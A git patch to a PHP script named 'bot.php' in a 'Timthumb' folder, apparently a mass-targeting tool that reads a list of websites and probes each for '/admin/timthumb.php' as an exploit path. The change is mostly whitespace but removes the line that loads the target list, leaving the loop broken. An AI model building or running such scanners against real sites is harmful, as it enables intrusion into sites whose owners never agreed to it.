From 56b6f4da24cc9a1e4149b1a002f42bb8d713c215 Mon Sep 17 00:00:00 2001 From: Abay Date: Sun, 6 Oct 2019 12:40:27 +0700 Subject: [PATCH] Update bot.php --- Timthumb/bot.php | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/Timthumb/bot.php b/Timthumb/bot.php index 60caaf9..7a88f23 100644 --- a/Timthumb/bot.php +++ b/Timthumb/bot.php @@ -6,14 +6,13 @@ system('clear'); require('header.php'); - $url=file($argv[1]); foreach ($url as $sites){ if(preg_match("@http://@", $sites) AND preg_match("@https://@",$sites)){ $sites = $sites; - }else{ + }else{ $sites = $sites; - } + } $sites=trim($sites); $exploit = "/admin/timthumb.php"; @@ -56,4 +55,4 @@ echo "\033[97m"; } echo "\033[97mTotal Target : $count\n"; -?> \ No newline at end of file +?>